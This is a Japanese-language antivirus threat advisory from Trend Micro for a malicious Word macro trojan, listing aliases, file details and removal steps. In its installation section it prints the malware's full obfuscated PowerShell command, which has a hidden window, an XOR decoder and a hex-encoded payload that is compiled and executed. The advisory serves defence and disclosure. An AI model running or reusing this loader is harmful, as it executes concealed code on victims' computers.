Trend Micro Security

Trojan.W97M.POWLOAD.TIOIBEKE

2020年3月10日
 解析者: Kennard Yap   

 別名:

VBA/TrojanDownloader.Agent.RVM trojan (NOD32); Trojan:W32/MalDoc.A (FSECURE)

 プラットフォーム:

Windows

 危険度:
 感染確認数:


  • マルウェアタイプ: トロイの木馬型
  • 破壊活動の有無: なし
  • 暗号化:  
  • 感染報告の有無: はい

  概要


マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。


  詳細

ファイルサイズ 24,951 bytes
タイプ DOC

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • powershell -WindowStyle Hidden Sl$$%-SSl$$%*Sfunction z994c {param($ubfa17a)$nc4d731='y95eab6';$ka666='';for ($i=0; $i -lt $ubfa17a.length;$i+=2){$y488b4=[convert]::ToByte($ubfa17a.Substring($i,2),16);$ka666+=[char]($y488b4 -bxor $nc4d731[($i/2)%$nc4d731.length]);}return $ka666;}Sl$$%-SSl$$%*S$hd2ba7a = '0c4a5c0b064265004a41000c59430a505b0241314f0a4d50084f3043174d5c08044c7f174d50170e12651c4b430c020745424c460c0f05162a404611040f183d5054020f0d450d5056165a174510575245321b450d5c584b282d0d0c4a5c0b064265004a41000c4c781c4d0e686b12431b555c0641015a184a46451754041c5c041e3a265a157058150e1042511b5e00130c53150a07474d27580d4b4c350e0b580d0417220416660b5656240506441c4a4647483f16094c57090801160a4d54110801161c414100130c16305741351510161601560705501e305741351510160c5a0151585103554a4117080c515958535c55571f426271090d2b5b0956471149405d1c4b5b000d51045b1515200f164400695a0c0f1616441917290e03523550571700104f5b106845111754155056451216570d505645041a421c4b5b45280c42294d47450654044a5f1d1615105f175e1512570001180e1c5e3a265a157058150e1042511b5e00130c53150a07474d4273174d471c310d5f174d0847370b440d4c54093110590d5c5611434b6b594940070d0b55594a4104150b55595c4d11041058595b5a0a0d42571c5c0657492b580d694117411353410104004d377f174d6511134254480d0304005a1a594c5c0b15424c4c5c5452054e16164c4145140b580d1957575856051c100e3e250e5a3054450a13161e5b7250170f075a4a0b1b010d0e145519700b15104f29565c0b155f142b4d59280e1453345c580a131b1455196600152e570a4d7017130d44445f540912071f2419461100165f1a19501d1507441719430a0806160a0c0c5657551e305741351510161d5d5650574e7f174d651113425d4c0f060155071a105741451506054c5807074859460c5b590c0242450d58410c02425f174d1504595b574e08034d48197f174d65111342581f5b04075504164419525353515051430c5c55011e5b080d50555600495a010351540318080047484b0d105f1d0b0700071b0d53585c2b580d6941174f38530b561c1e060d42161953575201054e02482c0f16660d4b15020353074f0e00580e5a551b5d074d0f0454485b01034d180f400d564d43510e4c0d01535101054b0904505653014e5b01555151064e09025155401f50025c0349055448080352545f0b30574135151018235c470a481951164d5a450750051a0a025e1c377f174d651113425b18000057565f1e2c705b11311644500c0e10080c42595503505756071f04055e08041e5858500052501e1e5b04545755035554545c54500155094d51514e590c4d15095757004d08534c481951164d5a450750051a0a025e1c204f0d5c6e38411500400d00075c1906010a0449511a501f15051d58524b42705b1131164459495156585b0e44745417120a57151774090d0d55317e590a03035a510a1c5e2c03440a5154094f215909401d12575b024c5b19554d12524a000c5d4d511f424a005c52540151575012412b580d69411749055448080352544c6216705b1157561e5012051d5152071b10191505510f400119564859504b0a56565658162e5c57260d0b53174d151c5657531f0d080b0415162e5c57260d0b53174d1d4c5a11420b505b0241170e185d0258240c40104b5a0b0c07580d177200152459155d50173103421111700b170b44165758000f16182a49500608035a3f565901041018384945090801570d505a0b25034218101e473d3e501b0c010059401d03000c51024a144c0e0006550606491b1c5e1855031c5f014b250d4117555a0405245f155c1d1f585b021a1117545056524d0804505400021d080c550456534d0b01075057074d0c0c545953014c5804525154021a0d0755045300485805065101064a0c04540256574858075d515505490e0d550757544e5a05555356064c080d540256074c09174c4d170e185d024c5a3244165a5016123142184b412c0f0459595e03070201044e045b001642660b5656001211650d584711280c501611405d000601500265170e01530a4a1b361503440d1152530301554b0e1c5e1307420c4b5b4551594b094c57090801160a4d54110801160a4d470c0f051603000c51024a450d4b5c0b0642421d00535004041f024a4117080c51594c5651555b054c04171c585753185b03475a11420b505b024105004b0a53583216441057524b240f460d400e030e101e10574145085f0642500911055b504c5c534b2d07581e4d5d5e08490b4b104e0718165359560d06030604447a5a0b1707440d17610a231b421c1141015804031c5f1b361400450d4b5c0b064a5f550b1c4950541f425e035752041d4411560d00101f51560d0603060459671510025602400a003e490b194b1015404117554d0d0c56544c7a1c575211093f1f4244470015174417195253535150424448';Sl$$%-SSl$$%*S$hd2ba7a2 = z994c($hd2ba7a);Sl$$%-SSl$$%*SAdd-Type -TypeDefinition $hd2ba7a2;Sl$$%-SSl$$%*S[v62ee1]::a89a716();Sl$$%-SSl$$%*SSl$$%-SSl$$%*SSl$$%-SSl$$%*_;


  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 15.718.02
初回 VSAPI パターンリリース日 2020年3月2日
VSAPI OPR パターンバージョン 15.719.00
VSAPI OPR パターンリリース日 2020年3月3日

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.W97M.POWLOAD.TIOIBEKE」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください